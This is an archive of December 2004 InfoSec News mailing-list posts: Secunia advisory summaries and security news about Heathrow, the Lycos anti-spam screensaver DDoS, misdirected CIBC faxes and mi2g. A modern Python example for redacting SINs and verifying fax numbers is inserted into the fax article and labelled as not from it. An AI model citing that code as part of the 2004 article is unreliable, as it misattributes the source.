Gentoo has issued updates for sun-jdk, sun-jre-bin, blackdown-jdk, and blackdown-jre. These fix a vulnerability, which can be exploited by malicious people to compromise a user's system.

Full Advisory: http://secunia.com/advisories/13332/

--
[SA13320] Debian update for tetex-bin
Critical: Highly critical
Where: From remote
Impact: System access
Released: 2004-11-26

Debian has issued an update for tetex-bin. This fixes some vulnerabilities, which potentially can be exploited by malicious people to compromise a user's system.

Full Advisory: http://secunia.com/advisories/13320/

--
[SA13315] Mandrake update for cyrus-imapd
Critical: Highly critical
Where: From remote
Impact: System access
Released: 2004-11-26

MandrakeSoft has issued an update for cyrus-imapd. This fixes some vulnerabilities, which can be exploited by malicious people to compromise a vulnerable system.

Full Advisory: http://secunia.com/advisories/13315/

--
[SA13310] Debian update for cyrus-imapd
Critical: Highly critical
Where: From remote
Impact: System access
Released: 2004-11-25

Debian has issued an update for cyrus-imapd. This fixes some vulnerabilities, which can be exploited by malicious people to compromise a vulnerable system.

Full Advisory: http://secunia.com/advisories/13310/

--
[SA13309] Gentoo update for cyrus-imapd
Critical: Highly critical
Where: From remote
Impact: System access
Released: 2004-11-25

Gentoo has issued an update for cyrus-imapd. This fixes some vulnerabilities, which can be exploited by malicious people to compromise a vulnerable system.

Full Advisory: http://secunia.com/advisories/13309/

--
[SA13307] jabberd Client to Server Component Buffer Overflow Vulnerability
Critical: Highly critical
Where: From remote
Impact: System access
Released: 2004-11-25

Zhaowei has reported a vulnerability in jabberd, which can be exploited by malicious people to compromise a vulnerable system.

Full Advisory: http://secunia.com/advisories/13307/

--
[SA13344] Conectiva update for abiword
Critical: Moderately critical
Where: From remote
Impact: System access
Released: 2004-12-02

Conectiva has issued an update for abiword. This fixes a vulnerability, which potentially can be exploited by malicious people to compromise a user's system.

Full Advisory: http://secunia.com/advisories/13344/

--
[SA13338] Debian update for libgd
Critical: Moderately critical
Where: From remote
Impact: System access
Released: 2004-11-30

Debian has issued an update for libgd.
This fixes some vulnerabilities, which potentially can be exploited by malicious people to compromise a vulnerable system.

Full Advisory: http://secunia.com/advisories/13338/

--
[SA13337] Debian update for libgd2
Critical: Moderately critical
Where: From remote
Impact: System access
Released: 2004-11-30

Debian has issued an update for libgd2. This fixes some vulnerabilities, which potentially can be exploited by malicious people to compromise a vulnerable system.

Full Advisory: http://secunia.com/advisories/13337/

--
[SA13323] Fedora update for squirrelmail
Critical: Moderately critical
Where: From remote
Impact: Cross Site Scripting
Released: 2004-11-29

Fedora has issued an update for SquirrelMail. This fixes a vulnerability, which can be exploited by malicious people to conduct script insertion attacks.

Full Advisory: http://secunia.com/advisories/13323/

--
[SA13339] SUSE update for kernel
Critical: Moderately critical
Where: From local network
Impact: Privilege escalation, DoS, Exposure of sensitive information
Released: 2004-12-02

SUSE has issued an update for the kernel. This fixes multiple vulnerabilities, which potentially can be exploited by malicious, local users to gain escalated privileges or by malicious people to cause a DoS (Denial of Service) or leak kernel memory.

Full Advisory: http://secunia.com/advisories/13339/

--
[SA13336] Fedora update for samba
Critical: Moderately critical
Where: From local network
Impact: DoS, System access
Released: 2004-11-30

Fedora has issued an update for samba. This fixes two vulnerabilities, which can be exploited by malicious users to cause a DoS (Denial of Service) or compromise a vulnerable system.

Full Advisory: http://secunia.com/advisories/13336/

--
[SA13313] Debian update for yardradius
Critical: Moderately critical
Where: From local network
Impact: System access
Released: 2004-11-26

Debian has issued an update for yardradius. This fixes a vulnerability, which can be exploited by malicious people to compromise a vulnerable system.

Full Advisory: http://secunia.com/advisories/13313/

--
[SA13312] YardRadius "process_menu()" Buffer Overflow Vulnerability
Critical: Moderately critical
Where: From local network
Impact: System access
Released: 2004-11-26

Max Vozeler has reported a vulnerability in YardRadius, which can be exploited by malicious people to compromise a vulnerable system.

Full Advisory: http://secunia.com/advisories/13312/

--
[SA13354] Fedora update for iptables
Critical: Less critical
Where: From remote
Impact:
Released: 2004-12-02

Fedora has issued an update for iptables. This fixes a security issue, where iptables under some circumstances fails to load required modules.

Full Advisory: http://secunia.com/advisories/13354/

--
[SA13326] Gentoo update for opendchub
Critical: Less critical
Where: From remote
Impact: System access
Released: 2004-11-29

Gentoo has issued an update for opendchub. This fixes a vulnerability, which can be exploited by certain malicious users to compromise a vulnerable system.

Full Advisory: http://secunia.com/advisories/13326/

--
[SA13325] Open DC Hub "RedirectAll" Buffer Overflow Vulnerability
Critical: Less critical
Where: From remote
Impact: System access
Released: 2004-11-29

Donato Ferrante has reported a vulnerability in Open DC Hub, which can be exploited by certain malicious users to compromise a vulnerable system.

Full Advisory: http://secunia.com/advisories/13325/

--
[SA13324] Gentoo update for phpwebsite
Critical: Less critical
Where: From remote
Impact: Cross Site Scripting
Released: 2004-11-29

Gentoo has issued an update for phpwebsite. This fixes a vulnerability, which can be exploited by malicious people to conduct cross-site scripting attacks.

Full Advisory: http://secunia.com/advisories/13324/

--
[SA13322] Gentoo update for phpmyadmin
Critical: Less critical
Where: From remote
Impact: Cross Site Scripting
Released: 2004-11-29

Gentoo has issued an update for phpmyadmin. This fixes some vulnerabilities, which can be exploited by malicious people to conduct cross-site scripting attacks.

Full Advisory: http://secunia.com/advisories/13322/

--
[SA13343] Debian update for openssl
Critical: Less critical
Where: Local system
Impact: Privilege escalation
Released: 2004-12-02

Debian has issued an update for openssl. This fixes a vulnerability, which can be exploited by malicious, local users to perform certain actions on a vulnerable system with escalated privileges.

Full Advisory: http://secunia.com/advisories/13343/

--
[SA13340] Sun Solaris ping Utility Privilege Escalation Vulnerability
Critical: Less critical
Where: Local system
Impact: Privilege escalation
Released: 2004-12-01

A vulnerability has been reported in Sun Solaris, which can be exploited by malicious, local users to gain escalated privileges.

Full Advisory: http://secunia.com/advisories/13340/

--
[SA13316] Mandrake update for a2ps
Critical: Less critical
Where: Local system
Impact: Privilege escalation
Released: 2004-11-26

MandrakeSoft has issued an update for a2ps. This fixes a vulnerability, which potentially can be exploited by malicious, local users to gain escalated privileges.

Full Advisory: http://secunia.com/advisories/13316/

--
[SA13314] Mandrake update for zip
Critical: Less critical
Where: Local system
Impact: Privilege escalation
Released: 2004-11-26

MandrakeSoft has issued an update for zip. This fixes a vulnerability, which potentially can be exploited by malicious, local users to gain escalated privileges.
Full Advisory: http://secunia.com/advisories/13314/

--
[SA13308] Linux Kernel Local DoS and Memory Content Disclosure Vulnerabilities
Critical: Less critical
Where: Local system
Impact: Exposure of sensitive information, DoS
Released: 2004-11-25

Two vulnerabilities have been reported in the Linux Kernel, which can be exploited by malicious, local users to cause a DoS (Denial of Service) or gain knowledge of potentially sensitive information.

Full Advisory: http://secunia.com/advisories/13308/

Other:

Cross Platform:
--
[SA13327] Orbz Password Field Buffer Overflow Vulnerability
Critical: Highly critical
Where: From remote
Impact: System access
Released: 2004-11-30

Luigi Auriemma has reported a vulnerability in Orbz, which potentially can be exploited by malicious people to compromise a vulnerable system.

Full Advisory: http://secunia.com/advisories/13327/

--
[SA13331] FreeImage Library Interleaved Bitmap Image Buffer Overflow Vulnerability
Critical: Moderately critical
Where: From remote
Impact: DoS, System access
Released: 2004-11-30

A vulnerability has been reported in FreeImage, which can be exploited by malicious people to cause a DoS (Denial of Service) and potentially compromise a user's system.

Full Advisory: http://secunia.com/advisories/13331/

--
[SA13329] Nuked-Klan "Links" Module Script Insertion Vulnerability
Critical: Moderately critical
Where: From remote
Impact: Cross Site Scripting
Released: 2004-11-29

XioNoX has reported a vulnerability in Nuked-Klan, which can be exploited by malicious people to conduct script insertion attacks.

Full Advisory: http://secunia.com/advisories/13329/

--
[SA13319] YaBB Unspecified "shadow" Tags Script Insertion Vulnerability
Critical: Moderately critical
Where: From remote
Impact: Cross Site Scripting
Released: 2004-11-26

A vulnerability has been reported in YaBB, which can be exploited by malicious people to conduct script insertion attacks.

Full Advisory: http://secunia.com/advisories/13319/

--
[SA13321] Groupmax World Wide Web Cross-Site Scripting and Directory Traversal
Critical: Less critical
Where: From remote
Impact: Cross Site Scripting, Exposure of sensitive information
Released: 2004-11-29

Two vulnerabilities have been reported in Groupmax World Wide Web and Groupmax World Wide Web Desktop, which can be exploited to conduct cross-site scripting attacks or access arbitrary HTML files.

Full Advisory: http://secunia.com/advisories/13321/

--
[SA13330] IberAgents Clear Text User Credential Disclosure
Critical: Less critical
Where: Local system
Impact: Exposure of sensitive information
Released: 2004-11-29

A security issue has been reported in IberAgents, which can be exploited by malicious, local users to gain knowledge of sensitive information.

Full Advisory: http://secunia.com/advisories/13330/

========================================================================

Secunia recommends that you verify all advisories you receive, by clicking the link.

Secunia NEVER sends attached files with advisories.

Secunia does not advise people to install third party patches, only use those supplied by the vendor.

Definitions: (Criticality, Where etc.)
http://secunia.com/about_secunia_advisories/

Subscribe:
http://secunia.com/secunia_weekly_summary/

Contact details:
Web : http://secunia.com/
E-mail : support@secunia.com
Tel : +45 70 20 51 44
Fax : +45 70 20 51 45

========================================================================

From isn at c4i.org Fri Dec 3 04:40:34 2004
From: isn at c4i.org (InfoSec News)
Date: Fri Dec 3 04:53:08 2004
Subject: [ISN] Former cybersecurity czar: Code-checking tools needed
Message-ID:

http://www.computerworld.com/securitytopics/security/story/0,10801,97988,00.html

By Grant Gross
DECEMBER 02, 2004
IDG NEWS SERVICE

WASHINGTON -- Software vendors need automated tools that look for bugs in their code, but it may be a decade before many of those tools are mature and widely used, said the former director of cybersecurity for the U.S. Department of Homeland Security.

Creating software assurance tools was one long-term focus of the DHS National Cybersecurity Division during Amit Yoran's tenure there, Yoran said today during the E-Gov Institute Homeland Security and Information Assurance Conferences in Washington.

About 95% of software bugs come from 19 "common, well-understood" programming mistakes, Yoran said, and his division pushed for automation tools that comb software code for those mistakes.

"Today's developers ... oftentimes don't have the academic discipline of software engineering and software development and training around what characteristics would create flaws in the program or lead to bugs," Yoran said.

Government research into some such tools is in its infancy, however, he added. "This cycle will take years if not decades to complete," he said. "We're realistically a decade or longer away from the fruits of these efforts in software assurance."

Yoran, who resigned from his DHS position in September after being on the job for a year, hinted at why he left, but sidestepped a question about the reasons.
In the private sector, he had a "real objective" on how to move forward, he said. "When you move into a strategic and somewhat ill-defined role of 'protect cyberspace,' that's a very difficult mission to get your arms around," he said. "You show up to work on a Monday morning, you're ready to put your fingers to the keyboard, you've got a team of folks working with you, what do you do ... to secure cyberspace from within the Department of Homeland Security?"

Most Internet resources are owned by the private sector, and the U.S. government has been hesitant to pass cybersecurity mandates, noted Yoran, former vice president of worldwide managed security services at Symantec Corp. With no operational or regulatory control over most of the Internet, the goal of securing cyberspace at DHS was difficult, he said.

Asked if that lack of authority was a reason for leaving the post, Yoran said his successor will need to "look at go-forward issues" in cybersecurity that the division can best address.

Yoran, however, defended President George W. Bush's National Strategy to Secure Cyberspace, released in February 2003. The strategy, which sets out five major cybersecurity recommendations, did not advocate regulation, and the White House took the right approach in developing those recommendations by consulting with private industry, Yoran said.

"As the Department of Homeland Security ... implementing the national strategy is not our job; it's not our responsibility," he said. "It's the nation's job, it's the international technology community's job and responsibility. We can just help."

The national strategy and efforts at DHS can help move cybersecurity efforts beyond the current "cat and mouse game" of finding vulnerabilities, assessing whether to patch them, and patching them when the problems become painful to companies, Yoran said.

He predicted a "radical transformation" in the cybersecurity field within two to four years as more companies and government agencies accept technologies such as Web services, remote Internet access and RFID (radio frequency identification) tags.

"In the next two to three years, you won't be able to define where your network begins and ends," Yoran said. "The paradigms we rely on today for protecting our information -- stronger firewalls, more accurate intrusion detection -- those types of technologies will be required, but they will be solving an increasingly small percentage of the challenges that are going to be facing us."

From isn at c4i.org Fri Dec 3 04:40:22 2004
From: isn at c4i.org (InfoSec News)
Date: Fri Dec 3 04:53:10 2004
Subject: [ISN] Heathrow Security Scare
Message-ID:

Forwarded from: William Knowles

http://www.sky.com/skynews/article/0,,30000-1162666,00.html

December 03, 2004

Sky News has uncovered major security lapses at Heathrow airport after an undercover reporter repeatedly gained access to restricted areas.

Airport offices and out-of-bounds airside areas were easily breached, forcing bosses to review procedures.

An undercover Sky News reporter highlighted how easy it was to walk into British Airways offices containing confidential security documents. He also managed to walk by passenger planes just hours before they were due to take off.

BA has launched an investigation following the report, while the British Airports Authority (BAA), owner of Heathrow, admitted "there was room for improvement".

The reporter returned to the airport on a number of occasions at night and carrying only a broom managed to escape the attention of security. Only once was he challenged, but even then staff did not ask for security credentials and he was allowed to carry on.

He found a BA office unlocked and inside key manuals detailing the airline's security procedures.
It detailed how staff are supposed to respond to bomb threats, how they are vetted before joining, and procedures for negotiating with hijackers.

On another occasion the reporter broke through what should have been a watertight cordon keeping the public away from restricted areas of the airport. From the public viewing platform on top of Terminal 2 he found a gap in razor wire and slipped through.

Once down on to the ground, he walked for 15 minutes unchecked and unnoticed around airliners that later would be filled with passengers.

A BAA spokesman said: "Safety and security are the top priorities at Heathrow.

"We are constantly seeking ways to maintain an effective barrier between the landside and airside parts of the airport, and to remain alert to any potential vulnerabilities.

"On the basis of the information provided by Sky News, it would appear that there is room for improvement in this particular area of the airport and we have already taken steps to address that."

And BA also said it would take action. A statement said: "Safety and security are always our top priorities and we are extremely concerned to hear that an undercover reporter has taken some documents and a high visibility vest from one of our landside offices within Terminal 1 at London Heathrow.

"We have launched our own immediate investigation into the allegations made against the airline to ensure that appropriate action is taken to avoid this happening again."

*==============================================================*
"Communications without intelligence is noise; Intelligence
without communications is irrelevant." Gen Alfred M. Gray, USMC
----------------------------------------------------------------
C4I.org - Computer Security, & Intelligence - http://www.c4i.org
*==============================================================*

From isn at c4i.org Fri Dec 3 04:40:46 2004
From: isn at c4i.org (InfoSec News)
Date: Fri Dec 3 04:53:11 2004
Subject: [ISN] Antispam screensaver downs two sites in China
Message-ID:

http://news.zdnet.com/2100-1009_22-5474963.html

By Dan Ilett
ZDNet (UK)
December 2, 2004

Lycos Europe's "Make love not spam" campaign has killed access to some of the Web sites of its target alleged spammers, Netcraft has found.

According to the Internet traffic monitoring company, Lycos Europe has successfully taken two Web sites hosted in China offline. The sites are bokwhdok.com and printmediaprofits.biz, according to a posting on Netcraft's Web site, dated this week.

"A distributed denial-of-service (DDoS) attack launched by users of Lycos Europe's MakeLoveNotSpam.com screensaver has succeeded in crippling several spammer sites, but some of the targeted sites remain available," the posting said.

Lycos Europe was unavailable for comment on the matter, but the company said on Tuesday it was not carrying out DDoS attacks, just slowing the bandwidth of its targets. It added that it had no intention of taking Web sites offline.

"I have to be very clear that it's not a denial-of-service attack," Malte Pollmann, director of communications services for Lycos, said on Tuesday. "We slow the remaining bandwidth to 5 percent. It wouldn't be in our interests to (carry out DDoS attacks). It is to increase the cost of spamming. We have an interest to make this, economically, unattractive."

Lycos Europe is a separate company from the Web portal that bears the Lycos name in the United States. It claims that it maintains roughly 40 million e-mail accounts in eight European countries.

The "Make love not spam" screensaver site appeared to have been taken down by its operators on Wednesday.
It now shows a graphic and the words "Stay tuned."

On Tuesday, the Web portal denied claims that it had been hit by hacker attacks, saying a reported defacement of the "Make love not spam" Web site was a hoax. But Netcraft, among others, reported that the Web site was unavailable at several intervals that day.

Lycos Europe launched its antispam campaign earlier this week, offering users a screensaver that uses the idle processing power of their computers to slow down bandwidth that connects to spammers' Web sites.

Steve Linford, director of international spam-fighting organization Spamhaus, said on Tuesday that by attacking spammers' bandwidth, the portal could be attacking innocent users' bandwidth.

From isn at c4i.org Fri Dec 3 04:41:03 2004
From: isn at c4i.org (InfoSec News)
Date: Fri Dec 3 04:53:13 2004
Subject: [ISN] You're faxing my what, where?
Message-ID:

http://www.canada.com/technology/story.html?id=abe9da66-e9cf-4f5e-9828-d97611c5a234

Jim Middlemiss
Financial Post
December 2, 2004

Businesses can avoid potential public relations and legal nightmares by developing privacy policies, authentication processes and using cutting-edge technology.

The Canadian Imperial Bank of Commerce learned this the hard way last week when U.S. scrapyard operator Wade Peer went public with his story about how one of Canada's largest banks was flooding his fax machine with highly confidential information about its clients for the past three years.

The faxes, he said, contained social insurance numbers, bank accounts and client signatures, and despite repeated calls from him they just kept piling up. Finally he sued CIBC to make them stop.

The problem appears to stem from the fact Mr. Peer's toll-free number for his autoparts business, which he was forced to close, is similar to that of one of the bank's processing centres.

After the story appeared in the press, the bank issued a cease-and-desist order to employees across the country, prohibiting them from sending internal faxes containing client information. Instead, they were advised to use the internal courier system or pick up a phone and engage in an old-fashioned conversation.

In a statement CIBC said for the long-term "we are exploring other potential secure technological alternatives for the timely transmission of confidential information between branches and processing centres."

Legislators and governments at the provincial and federal level have identified this problem and passed a range of laws requiring companies to take better care of sensitive employee and client information in their possession.

Claudiu Popa, president of Informatica, a Toronto-based information security firm, says in addition to financial penalties and lawsuits for damages, "your name is going to get dragged in the news. Embarrassment is one of the biggest fears of companies today."

In addition to faxes, misdirected voice mails, improperly addressed e-mails and improperly accessed documents all pose a problem when it comes to protecting confidential data. While it's virtually impossible to eliminate the problem, there are steps companies can take to reduce it, security experts say.

The key is developing a solid set of privacy policies and authentication processes coupled with cutting-edge technologies, says John Weigelt, chief security advisor at Microsoft Canada. "They [businesses] have to establish principles to secure their environment." That includes restricting access to information and examining "each layer of defence."

FAX FIXES

When it comes to faxing large volumes of information, Alan Gahtan, an information technology lawyer in Toronto, says "I think there are some policies and procedures a company can enact to reduce this kind of [risk]."

First, he says, "you want to reduce the amount of information."
Don't send social insurance numbers, for example. Instead, deposit a master file with the office you are sending the information to and link to that list through the use of names.

If a business has a large volume of faxes going one place, the most obvious solution is using speed dial. That eliminates user error as long as the number is correctly input the first time and you check regularly to ensure it has not been changed.

But why even send faxes in an era of digital information? asks Informatica's Mr. Popa. "Faxes are outdated. Faxes are not secure. Most organizations should preserve documents digitally."

If a business has a lot of data flowing to a single place, it could implement a virtual private network, a secure direct pipeline. In the case of computer networks, a scanner can be used to digitize information programmed to be sent to another printer's Internet Protocol address.

By digitizing the information, it can be subject to encryption and the use of digital certificates, which prohibit unauthorized users from accessing or reading a confidential document, he says.

Faxing documents that require a signature can be eliminated with the use of electronic signatures and basic encryption functions such as S/MIME (Secure/Multipurpose Internet Mail Extensions), which lets the recipient verify who the information is from and access it only if they have the correct digital certificate on their computer.

VOICE MAIL PROBLEMS

If a caller phones the wrong number and leaves a message, there is little that can be done to retrieve it, Mr. Gahtan says. A policy should be in place preventing staff from leaving confidential information on a voice mail.

Also, voice mail requires a PIN to access messages, which opens doors to hackers. The redial function on some phones recalls the last numbers dialled, including a PIN. Mr. Gahtan says he makes it a practice of calling another number after accessing his voice mail to ensure his number is bounced from the redial list.

ENDING E-MAIL ERRORS

Besides the possibility of typing in the wrong address or name in the directory, users should avoid the user-group function, Mr. Gahtan says, because often the sender is not sure whose names are in the group.

"Secure messaging and rights management becomes important" when e-mails and computer networks are involved, Mr. Weigelt says. Technologies can be deployed to control and monitor access to documents within an organization. When sending documents outside, encryption is the key to ensuring unwelcome eyes don't view them.

Ben Sapiro, an independent IT security consultant in Toronto, says monitoring and controlling access to documents online is critical. Firms need to use server audit tools better to control who is accessing which documents. Proxy servers can inspect traffic going across the network and monitor it. Alerts can be set to advise appropriate managers if someone is trying to access documents that they are not entitled to see.

LOCKING DOWN EXTERNAL RELATIONS

Businesses also need to be aware of the pitfalls in sending confidential data to third parties. Mr. Weigelt suggests putting agreements in place to ensure information is safeguarded.

Mr. Gahtan says: "You want your supplier to agree to conform to some minimum security practices." Those practices should also apply to subcontractors. As well, prohibit information from going offshore, where privacy standards may be lax.

Also, include indemnity provisions so if something bad happens and your business faces a financial penalty or hardship, then the party that caused the problem reimburses you.
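The two fax fixes Mr. Gahtan describes (withhold the social insurance number in favour of a master-file reference, and dial only a verified speed-dial entry that is checked for tampering) can be turned into an outbound policy check. The following is an added Python example, not code from the article or from any bank or product it names; the directory key, centre names, fax numbers and sample document are constructed values, and the SIN check uses the Luhn check digit that Canadian SINs carry.

```python
"""Outbound-fax policy check modelled on the FAX FIXES advice above.

Control 1 (data minimisation): find 9-digit runs that pass the Luhn check a
SIN carries and replace them with a reference to the recipient's master
file, keyed by client name.  Runs that fail Luhn are left alone, since they
are more likely to be account or reference numbers.

Control 2 (destination integrity): every speed-dial entry carries an HMAC
over name|number, computed when the entry was approved.  An entry whose
number was edited afterwards fails verification and is never dialled.

All values below (key, names, numbers, document) are constructed samples.
"""
import hashlib
import hmac
import re
from dataclasses import dataclass

SIN_CANDIDATE = re.compile(r"\b(\d{3})[ -]?(\d{3})[ -]?(\d{3})\b")
MASTER_FILE_REF = "[SIN withheld - on file under client name]"


def luhn_valid(digits: str) -> bool:
    """Luhn check over a digit string whose last digit is the check digit."""
    total = 0
    for i, ch in enumerate(reversed(digits)):
        d = int(ch)
        if i % 2 == 1:          # double every second digit from the right
            d = d * 2 - 9 if d * 2 > 9 else d * 2
        total += d
    return total % 10 == 0


def redact_sins(text: str) -> tuple[str, int]:
    """Return (text with Luhn-valid SINs replaced, number of replacements)."""
    count = 0

    def _sub(m: re.Match) -> str:
        nonlocal count
        if not luhn_valid("".join(m.groups())):
            return m.group(0)          # not a SIN: leave the digits alone
        count += 1
        return MASTER_FILE_REF

    return SIN_CANDIDATE.sub(_sub, text), count


@dataclass(frozen=True)
class SpeedDial:
    name: str
    number: str
    tag: str      # hex HMAC-SHA256 over "name|number", set at approval time


def tag_entry(key: bytes, name: str, number: str) -> str:
    return hmac.new(key, f"{name}|{number}".encode(), hashlib.sha256).hexdigest()


def build_directory(key: bytes, entries: list[tuple[str, str]]) -> dict[str, SpeedDial]:
    """Approve a list of (centre name, number) pairs under the directory key."""
    return {n: SpeedDial(n, num, tag_entry(key, n, num)) for n, num in entries}


def resolve_destination(key: bytes, directory: dict[str, SpeedDial], name: str) -> str:
    """Return the approved number for a named centre; refuse unknown or
    altered entries.  The sender never types a number by hand."""
    entry = directory.get(name)
    if entry is None:
        raise KeyError(f"no approved speed-dial entry for {name!r}")
    if not hmac.compare_digest(tag_entry(key, entry.name, entry.number), entry.tag):
        raise ValueError(f"speed-dial entry for {name!r} has been altered since approval")
    return entry.number


def prepare_fax(key: bytes, directory: dict[str, SpeedDial],
                destination: str, document: str) -> tuple[str, str, int]:
    """Apply both controls; returns (number to dial, redacted body, SINs withheld)."""
    number = resolve_destination(key, directory, destination)
    body, withheld = redact_sins(document)
    return number, body, withheld


# Constructed sample data (555-01xx numbers are reserved for fiction).
DIRECTORY_KEY = b"constructed-example-key-not-for-production"
APPROVED = build_directory(DIRECTORY_KEY, [("Processing Centre A", "1-800-555-0100")])
# Same entry after someone edited the number without re-approval.
TAMPERED = {"Processing Centre A": SpeedDial("Processing Centre A", "1-800-555-0199",
                                             APPROVED["Processing Centre A"].tag)}
# 046-454-286 is a well-known Luhn-valid test SIN; 123 456 789 fails Luhn.
SAMPLE_DOCUMENT = "Client Jane Example, SIN 046-454-286, reference 123 456 789."

if __name__ == "__main__":
    number, body, n = prepare_fax(DIRECTORY_KEY, APPROVED, "Processing Centre A", SAMPLE_DOCUMENT)
    print(f"dial {number}; withheld {n} SIN(s): {body}")
    try:
        prepare_fax(DIRECTORY_KEY, TAMPERED, "Processing Centre A", SAMPLE_DOCUMENT)
    except ValueError as exc:
        print("refused:", exc)
```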
From isn at c4i.org Mon Dec 6 04:27:48 2004 From: isn at c4i.org (InfoSec News) Date: Mon Dec 6 05:21:29 2004 Subject: [ISN] India to work jointly with Russia to tackle cyber crime Message-ID: http://www.hindustantimes.com/news/181_1136746,0003.htm Press Trust of India Bangalore December 4, 2004 India's Cyber Emergency Response Team (CERT) plans to jointly work with Russia to combat cyber crime, including virus and hacker attacks in their computer networks, a top IT department official said on Saturday. "We are trying to see how best our CERT can work with Russian authorities on Information Security and prevent attacks by virus, worms and hackers," Union IT Department Joint Secretary Madhavan Nambiar said in Bangalore. Delivering his address at the Indo-Russian Information and Communication Technologies Cooperation Conference in Bangalore, Nambiar said the cyber security plan was in the early stages, but CERT had already signed a protocol on e-security with Russia. He said the three areas of cooperation in the IT domain were software parks, Information Security and Software services. The Software Technology Parks of India (STPI) was in the process of setting up a software park in Moscow, Nambiar said. Russian IT Minister Leonid D Reiman invited Indian software service firms to leverage the engineering talent in his country to export software to Europe and the United States. "We want to retain talent within Russia and Indian companies can work on projects in our country for customers in third countries like Europe and America," he said. Reiman said the Russian IT industry team, which has joined President Vladimir Putin's delegation, was keen to learn about the success of India in the software sector and replicate it in their country. 
From isn at c4i.org Mon Dec 6 04:26:27 2004 From: isn at c4i.org (InfoSec News) Date: Mon Dec 6 05:21:31 2004 Subject: [ISN] Secrecy News -- 12/03/04 Message-ID: ---------- Forwarded message ---------- Date: Fri, 3 Dec 2004 08:46:03 -0500 From: "Aftergood, Steven" To: secrecy_news@lists.fas.org Subject: Secrecy News -- 12/03/04 SECRECY NEWS from the FAS Project on Government Secrecy Volume 2004, Issue No. 107 December 3, 2004 ** HOMELAND SECRECY ** FLYING BLIND: THE DECLINE OF SCIENCE POLICY ADVICE ** WHITE HOUSE PANEL CRITICIZES CYBERSECURITY OVERCLASSIFICATION ** SCIENCE AND TECHNOLOGY IN THE 108TH CONGRESS (CRS) ** THE CLASSIFIED SILEX URANIUM ENRICHMENT PROJECT ** CIA YIELDS TO SOUTH KOREA IN SPELLING DISPUTE [...] WHITE HOUSE PANEL CRITICIZES CYBERSECURITY OVERCLASSIFICATION Sometimes the act of classifying scientific or technical information can diminish national security instead of enhancing it. Last month, a White House panel concluded that the growing classification of government research on computer security is not serving the nation well because it renders such research inaccessible outside of narrow military and intelligence channels. "Classified cybersecurity R&D is, of course, needed for numerous purposes," observed F. Thomson Leighton, chair of the cybersecurity subcommittee of the President's Information Technology Advisory Committee. "However, classified work tends not to benefit generic cybersecurity products--which are used throughout society (including the military and intelligence communities)," he said at a meeting last month. In the future, he said, the government should "favor unclassified basic research" in cybersecurity. Leighton's speech was first reported in the newsletter Inside the Pentagon on November 25. See "White House Panel Blasts Pentagon's Cybersecurity R&D Policies" by John T. 
Bennett, Inside the Pentagon, reposted with permission and with a link to the underlying presentation here: http://www.fas.org/sgp/news/2004/11/itp112504.html [...] _______________________________________________ Secrecy News is written by Steven Aftergood and published by the Federation of American Scientists. To SUBSCRIBE to Secrecy News, send email to secrecy_news-request@lists.fas.org with "subscribe" in the body of the message. To UNSUBSCRIBE, send a blank email message to secrecy_news-remove@lists.fas.org OR email your request to saftergood@fas.org Secrecy News is archived at: http://www.fas.org/sgp/news/secrecy/index.html Secrecy News has an RSS feed at: http://www.fas.org/sgp/news/secrecy/index.rss _______________________ Steven Aftergood Project on Government Secrecy Federation of American Scientists web: www.fas.org/sgp/index.html email: saftergood@fas.org voice: (202) 454-4691 From isn at c4i.org Mon Dec 6 04:26:10 2004 From: isn at c4i.org (InfoSec News) Date: Mon Dec 6 05:21:32 2004 Subject: [ISN] [infowarrior] - mi2g: Welcome to the FUD Factory Message-ID: Forwarded from: Richard Forno mi2g: Welcome to the FUD Factory Richard Forno / www.infowarrior.org #2004-12 Copyright (c) 2004 by Author. Permission granted to reproduce with credit. Source URL: http://www.infowarrior.org/articles/2004-12.html - - - - - Everyone's favorite FUD Factory -- "security intelligence" company mi2g -- is at it again. This week, the firm posted a "news alert" sensationally entitled 'The rise of corporate hate sites - lies, damned lies and extortion'. While the topic of "corporate hate sites" is an interesting and even relevant one for today's day and age, it appears that the true goal of this mi2g "news alert" was to attack security pundit Rob Rosenberger's website Vmyths.Com for his analysis and commentary about security-related companies, including mi2g. 
(For those unaware, Rob is one of the few pundits who calls things as he sees them, and, while refreshing, that sometimes runs contrary to what companies want the public to know.) It's pathetic, if not somewhat amusing, to see mi2g stooping to such desperate levels that it feels obligated to apply the "hate site" moniker to a website that disagrees with its corporate views....however, for a firm that thrives on the development, packaging, marketing, and sales of hysteria, misdirection, selective analysis, and the continuing propagation of Fear, Uncertainty, and Doubt (FUD), this is simply business-as-usual. At least Rosenberger publicly cites his sources and cross-checks his facts. For example, one glaring omission in this report is that while mi2g claims a growth in the number of "corporate hate sites" on the Internet, its report does not account for the explosive growth of websites of all sorts during that time (including, quite logically, "corporate hate sites") -- meaning that mi2g's scary statistics on this allegedly-new "digital risk" are valid only within the vacuum that they're presented. Caveat reader! You can read the report if you like, but I'll save you some time -- according to mi2g, the real enemy in cyberspace isn't hackers, it's people whose opinions you disagree with. And that's quite evident when reading mi2g's statement: in its 14 paragraphs, there are 6 dedicated to attacking and attempting to discredit Rosenberger and Vmyths while implicitly begging the public for sympathy. Six out of 14. My proprietary BESPOAKE? analysis shows that to be almost half of the entire document -- with that much attention, one would think mi2g wants to portray Rosenberger as the Fourth Horseman of the Internet. As I wrote back in 2002, let's not forget that mi2g started off as an e-business enabler focused on operating portal sites (such as Carlounge.Com and Lawlounge.Com) under the corporate motto "Bringing The Web To The World." 
Suddenly, in 1999 with the digital apocalypse of Y2K looming ahead, the firm morphed into an internet security company that "by integrating state-of-the-art software engineering technology with super computing capability is revolutionising the world of eCommerce and for the first time maximising the return from the internet whilst minimising the risk." From cars to cyberterrorism in only a few short years. PT Barnum would be proud. (Perhaps mi2g's new corporate motto should be "Bringing FUD to The World One News Release at a Time.") Is mi2g so insecure with its public perception that it had to concoct and sensationally-hype an ominous-sounding "digital risk" in order to justify its attack on a respected website expressing an opinion and asking legitimate-but-still-unanswered questions about its services? You tell me -- but keep in mind this is the same "security intelligence" company now declaring that the greatest cyber-danger these days isn't hackers, technical vulnerabilities, exploitable software, or human complacency but rather independent thinking and holding companies accountable for their statements and services. My sources tell me that mi2g soon will announce it has reason to believe that Saddam Hussein's missing WMD are stockpiled in Rosenberger's Texas basement because it rained in London today. Damn that Rosenberger - is there anything he can't do? mi2g's statement: http://www.mi2g.com/cgi/mi2g/press/021204.php More info on mi2g and its history: http://www.infowarrior.org/articles/2002-12.html http://vmyths.com/resource.cfm?id=64&page=1 http://www.attrition.org/errata/charlatan.html You are a subscribed member of the infowarrior list. Visit www.infowarrior.org for list information or to unsubscribe. This message may be redistributed 